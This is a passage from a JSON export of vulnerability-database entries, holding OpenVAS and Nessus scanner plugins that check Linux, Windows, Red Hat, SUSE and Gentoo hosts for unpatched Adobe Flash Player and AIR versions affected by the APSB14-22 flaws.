\"CVE-2014-8439\");\n script_bugtraq_id(70437, 70442, 70441, 71289);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-10-20 12:43:30 +0530 (Mon, 20 Oct 2014)\");\n\n script_name(\"Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - Two unspecified errors can be exploited to corrupt memory and subsequently\n execute arbitrary code.\n\n - An integer overflow error can be exploited to execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before 11.2.202.411\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.411 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59729\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.411\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:27", "bulletinFamily": "scanner", "description": "This host is installed with Adobe AIR and\n is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-10-20T00:00:00", "id": "OPENVAS:1361412562310805005", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805005", "title": "Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805005\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-8439\");\n script_bugtraq_id(70437, 70442, 70441, 71289);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-10-20 12:51:31 +0530 (Mon, 20 Oct 2014)\");\n\n script_name(\"Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe AIR and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - Two unspecified errors can be exploited to corrupt memory and subsequently\n execute arbitrary code.\n\n - An integer overflow error can be exploited to execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe AIR version before 15.0.0.293 on\n Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe AIR 15.0.0.293 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59729\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"15.0.0.293\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:23", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201411-06", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121281", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121281", "title": "Gentoo Security Advisory GLSA 201411-06", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201411-06.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121281\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:59 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201411-06\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201411-06\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\", \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\", \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\", \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\", \"CVE-2014-8441\", \"CVE-2014-8442\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201411-06\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.418\"), vulnerable: make_list(\"lt 11.2.202.418\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T03:00:42", "bulletinFamily": "scanner", "description": " - Security update to 11.2.202.411 (bnc#901334) :\n\n - APSB14-22, CVE-2014-0569 (ZDI-14-365), CVE-2014-0564,\n CVE-2014-0558", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2014-603.NASL", "href": "https://www.tenable.com/plugins/nessus/78719", "published": "2014-10-29T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:1329-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-603.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78719);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/10 11:50:02\");\n\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:1329-1)\");\n script_summary(english:\"Check for the openSUSE-2014-603 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Security update to 11.2.202.411 (bnc#901334) :\n\n - APSB14-22, CVE-2014-0569 (ZDI-14-365), CVE-2014-0564,\n CVE-2014-0558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=901334\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00033.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.411-2.96.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.411-2.96.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.411-2.96.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.411-70.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.411-70.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.411-70.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:20:54", "bulletinFamily": "scanner", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB14-22, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2014-0558, CVE-2014-0564,\nCVE-2014-0569)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.411.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2014-1648.NASL", "href": "https://www.tenable.com/plugins/nessus/78503", "published": "2014-10-16T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:1648)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1648. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78503);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\");\n script_bugtraq_id(70437, 70441, 70442);\n script_xref(name:\"RHSA\", value:\"2014:1648\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:1648)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB14-22, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2014-0558, CVE-2014-0564,\nCVE-2014-0569)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.411.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0569\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1648\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.411-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.411-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:53", "bulletinFamily": "scanner", "description": "This update fixes multiple code execution vulnerabilities in\nflash-player (APSB14-22). CVE-2014-0564 / CVE-2014-0558 /\nCVE-2014-0569 have been assigned to this issue.", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_FLASH-PLAYER-141020.NASL", "href": "https://www.tenable.com/plugins/nessus/78885", "published": "2014-11-06T00:00:00", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 9898)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78885);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2015/04/13 14:33:57 $\");\n\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 9898)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes multiple code execution vulnerabilities in\nflash-player (APSB14-22). CVE-2014-0564 / CVE-2014-0558 /\nCVE-2014-0569 have been assigned to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=901334\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0558.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0564.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0569.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9898.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.411-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.411-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.411-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.411-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.411-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.411-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T10:19:05", "bulletinFamily": "scanner", "description": "According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 15.0.0.249. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": 